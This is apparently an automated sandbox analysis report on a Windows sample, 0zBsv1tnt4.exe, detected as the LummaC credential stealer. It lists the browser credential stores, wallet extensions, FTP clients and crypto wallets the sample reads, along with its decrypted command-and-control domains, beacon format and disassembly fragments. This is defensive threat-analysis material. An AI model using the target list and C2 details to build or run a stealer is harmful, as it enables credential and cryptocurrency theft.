Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
104.21.11.101	mindhandru.buzz	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.8

Contacted Domains

Name	IP	Active
www.google.com	142.250.181.68	true
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true
mindhandru.buzz	104.21.11.101	true
js.monitor.azure.com	unknown	unknown
mdec.nelreports.net	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
scentniej.buzz	false	high
hummskitnj.buzz	false	high
mindhandru.buzz	false	high
https://mindhandru.buzz/api	false	high
rebuildeso.buzz	false	high
appliacnesot.buzz	false	high
screwamusresz.buzz	false	high
cashfuzysao.buzz	false	high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false	high
inherineau.buzz	false	high
prisonyfork.buzz	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0zBsv1tnt4.exe

Avira: detected

Found malware configuration

Source: 0zBsv1tnt4.exe.1868.0.memstrmin

Multi AV Scanner detection for submitted file

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%			Perma Link
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 0zBsv1tnt4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_009658D5 CryptUnprotectData,

0_2_009658D5

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Uses 32bit PE files

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00971A10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00990340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_0095CC7A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ebx	0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00991720
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov esi, ecx	0_2_009790D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097E0DA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then push esi	0_2_0095C805
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00972830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_0098C830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097C850
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_0098C990
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097B980
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009789E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D116
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0097B170
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D17D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_00991160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, dword ptr [00996130h]	0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0097AAC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00986210
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00958A50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096C300
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00964CA0
